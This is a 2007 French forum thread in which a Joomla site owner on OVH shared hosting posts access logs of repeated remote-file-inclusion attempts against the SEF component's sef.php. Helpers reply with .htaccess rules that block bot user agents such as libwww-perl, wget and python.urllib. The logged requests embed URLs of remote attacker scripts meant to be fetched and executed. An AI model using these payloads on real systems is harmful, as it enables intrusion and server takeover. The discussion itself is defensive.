HELP! blocage de site Web par OVH:libwww-perl

[wadzaloo]

Bonsoir !

Je suis sur Joomla 1.0.12 en mutualisé OVH90 plan

Mon site web est pour la 2eme fois en 3 jours par OVH pour la raison suivante:
Problème rencontré : Hidden PERL script
Commande apparente : init_4
Exécutable utilisé : /usr/bin/perl

Je pense qu'ils ont bien raison, ça sent pas bon ! voici le bout de log que j'ai recupéré aujourd'hui:

Code: Tout sélectionner

ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:09:51 +0100] "GET /content/blogsection/18/240//components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 301 5 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:09:54 +0100] "GET /bric-a-brac/section// HTTP/1.1" 404 40352 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:09:55 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 200 76 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:10:16 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://jorgevolio.com/.cookies/xt.gif? HTTP/1.1" 200 174 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:10:17 +0100] "GET /content/blogsection/18//components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 403 338 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:12:58 +0100] "GET /content/blogsection/18/240//components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 403 342 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:12:58 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 403 315 "-" "libwww-perl/5.805"
ip-72-55-179-141.static.privatedns.com www.legrattonaute.com - [10/Dec/2007:13:12:59 +0100] "GET /content/blogsection/18//components/com_sef/sef.php?mosConfig_absolute_path=http://www.xsenhamaximo.xpg.com.br/did.txt? HTTP/1.1" 403 338 "-" "libwww-perl/5.805"



Malheureusement, mes compétences s'arretent la car je ne sais pas quoi faire contre cette attaque...
Le fichier sef.php est il faillible ? (j'utilise SEFAdvance )

Merci d'avance !

[padawan2]

Quelle version de SEFAdvance utilises tu ?

Peut être est-ce une ancienne version où il y a un trou de sécurité...
Ensuite, vu que c'est un module commercial, tu devrais peut être te tourner vers leur support.

[rog]

rien dans les logs n'indique que tu as été hacké

ces logs indiquent que ton site fait l'objet d'une attaque, rien de plus ni de hidden

rog

[wadzaloo]

Quelle version de SEFAdvance utilises tu ?

Peut être est-ce une ancienne version où il y a un trou de sécurité...
Ensuite, vu que c'est un module commercial, tu devrais peut être te tourner vers leur support.

J'tilise la derniere version. Demande envoyée vers le support itou.
Comme je suis une quiche, vous me confirmez que ce qu'on voit sur le log est du a une faille de securité par le sef ?

Sinon, j'avais trouvé sur le forum un pb equivalent avec SPIP je crois mais je n'ai aucune idée de la façon dont regler le probleme. Evidemment sur les 2 attaques, l'IP d'origine ne permet de remonter aucune piste...

Merci pour votre aide

[techron]

@ wadzaloo

C'est un bot malveillant http://www.webrankinfo.com/forums/viewtopic_64945.htm

Que fait ce bot ?
En changeant constammment de IP, il scanne les sites web et détecte les failles dans les scripts php, asp, et perl selon le contenu du fichier txt. Les hackers sont d'origine russes.

Protection:
Comme le IP change constanmment, la meilleure protection est un fichier htaccess placé à la racine du site.

Comment ?

Code: Tout sélectionner

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} libwww [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp
RewriteRule ^.*$ http://127.0.0.1/ [R,L] 

Le robot est redirigé vers lui-même.

[wadzaloo]

Ooops, j'ai lu le topic, ça fout les jetons

En tout cas, merci beaucoup je viens de modifier le htacess avec ton code et je poste de mon coté sur SEF Advance pour savoir s'il y a une faille

[techron]

Je ne t'ai que partiellement aidé. Cela fait un bon bout de temps que je suis ces salauds à la trace via mes logs de mes sites. Ils peuvent aussi utiliser la librairie python.urllib pour détecter les failles.

A rajouter dans ton htaccess.

Edit:
Tant qu'a y être, ajoute aussi wget

/forum/forumdisplay.php?f=http://ninaru.hut2.ru/images/cs.txt?
Http Code: 403 Date: Dec 10 16:02:39 Http Version: HTTP/1.1 Size in Bytes: -
Referer: -
Agent: Wget/1.1 (compatible; i486; Linux; RedHat7.3)

[wadzaloo]

Re-merci pour le tuyau

J'espere que tu nous informeras si tu as du nouveau! (idem de mon coté)

[quid]

Le shackers sont quand même pas assez nuls pour ne pas changer le referer ?

[techron]

@ wadzaloo
Le code donné plus haut va bloquer toutes les versions de libwww. Il est efficace.

Depuis quelques semaines, j'utilise plutôt une version du code suivant. Il englobe tous les useragents cités plus haut et d'autres non-cités. Personnalise-le comme il te convient en tenant compte de cette note:
Warning. This example includes a list of HTTP_USER_AGENTs that are used by known site copy programs..

La compilation des useragents n'est pas mienne. Voici donc la source:
http://www.levrah.net/support.mv?resw=8 ... aq_hosting

Code: Tout sélectionner

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} acoi [NC,OR]
RewriteCond %{HTTP_USER_AGENT} anon [NC,OR]
RewriteCond %{HTTP_USER_AGENT} asptear [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bandit [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cache [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cj.spider [NC,OR]
RewriteCond %{HTTP_USER_AGENT} collect [NC,OR]
RewriteCond %{HTTP_USER_AGENT} combine [NC,OR]
RewriteCond %{HTTP_USER_AGENT} control [NC,OR]
RewriteCond %{HTTP_USER_AGENT} contrpl [NC,OR]
RewriteCond %{HTTP_USER_AGENT} contype [NC,OR]
RewriteCond %{HTTP_USER_AGENT} copier [NC,OR]
RewriteCond %{HTTP_USER_AGENT} copy [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dnload [NC,OR]
RewriteCond %{HTTP_USER_AGENT} download [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dsns [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dts.agent [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ecatch [NC,OR]
RewriteCond %{HTTP_USER_AGENT} email [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fetch [NC,OR]
RewriteCond %{HTTP_USER_AGENT} filehound [NC,OR]
RewriteCond %{HTTP_USER_AGENT} flashget [NC,OR]
RewriteCond %{HTTP_USER_AGENT} frontpage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ftp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fuck [NC,OR]
RewriteCond %{HTTP_USER_AGENT} getright [NC,OR]
RewriteCond %{HTTP_USER_AGENT} getter [NC,OR]
RewriteCond %{HTTP_USER_AGENT} go.zilla [NC,OR]
RewriteCond %{HTTP_USER_AGENT} go.ahead.got.it [NC,OR]
RewriteCond %{HTTP_USER_AGENT} grab [NC,OR]
RewriteCond %{HTTP_USER_AGENT} grub.client [NC,OR]
RewriteCond %{HTTP_USER_AGENT} httpget [NC,OR]
RewriteCond %{HTTP_USER_AGENT} httrack [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hyperspin [NC,OR]
RewriteCond %{HTTP_USER_AGENT} installshield.digitalwizard [NC,OR]
RewriteCond %{HTTP_USER_AGENT} internetseer [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jobo [NC,OR]
RewriteCond %{HTTP_USER_AGENT} konqueror [NC,OR]
RewriteCond %{HTTP_USER_AGENT} leech [NC,OR]
RewriteCond %{HTTP_USER_AGENT} libwww-perl [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lwp [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mailto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mister.pix [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moozilla [NC,OR]
RewriteCond %{HTTP_USER_AGENT} netants [NC,OR]
RewriteCond %{HTTP_USER_AGENT} newt [NC,OR]
RewriteCond %{HTTP_USER_AGENT} offline [NC,OR]
RewriteCond %{HTTP_USER_AGENT} oliverperry [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pavuk [NC,OR]
RewriteCond %{HTTP_USER_AGENT} picture [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pingalink [NC,OR]
RewriteCond %{HTTP_USER_AGENT} publish [NC,OR]
RewriteCond %{HTTP_USER_AGENT} python.urllib [NC,OR]
RewriteCond %{HTTP_USER_AGENT} registry.verify [NC,OR]
RewriteCond %{HTTP_USER_AGENT} scan [NC,OR]
RewriteCond %{HTTP_USER_AGENT} snag [NC,OR]
RewriteCond %{HTTP_USER_AGENT} softwing [NC,OR]
RewriteCond %{HTTP_USER_AGENT} strip [NC,OR]
RewriteCond %{HTTP_USER_AGENT} stamina [NC,OR]
RewriteCond %{HTTP_USER_AGENT} surveybot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} teleport [NC,OR]
RewriteCond %{HTTP_USER_AGENT} t.h.u.n.d.e.r.s.t.o.n.e [NC,OR]
RewriteCond %{HTTP_USER_AGENT} turnitinbot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} udmsearch [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webcollage [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webfilter.robot [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webinator [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webreaper [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webster [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webwasher [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wget [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wildsoft [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wwwoffle [NC,OR]
RewriteCond %{HTTP_USER_AGENT} zip [NC]
RewriteRule ^.* - [F]

<Files 403.shtml>
order allow,deny
allow from all
</Files>


[wadzaloo]

bravo pour ce travail (j'ai mis une étoile pour recommander ce post)

[wadzaloo]

Bonjour

Re Zut...site bloqué de nouveau

Voici le log mais je ne sais pas de quelle lib il s'agit (a priori pas dans la liste ci-dessus)

Code: Tout sélectionner

189.1.161.34 www.legrattonaute.com - [15/Dec/2007:08:04:48 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://qlzrox.iespana.es/sb4? HTTP/1.1" 500 610 "-" "Mozilla/3.0 (compatible; Indy Library)"

Et faille de sécurité toujours pas trouvée...

[wadzaloo]

Bon, pour le moment, j'ai ajouté ça dans htacess (trouvé sur un forum US)

Code: Tout sélectionner

SetEnvIf User-Agent ^Mozilla.*indy keep_out
order allow,deny
allow from all
deny from env=keep_out

Je sais pas si c'est bon

[rog]

189.1.161.34 www.legrattonaute.com - [15/Dec/2007:08:04:48 +0100] "GET //components/com_sef/sef.php?mosConfig_absolute_path=http://qlzrox.iespana.es/sb4? HTTP/1.1" 500 610 "-" "Mozilla/3.0 (compatible; Indy Library)"

quand même bizarre ton histoire

rog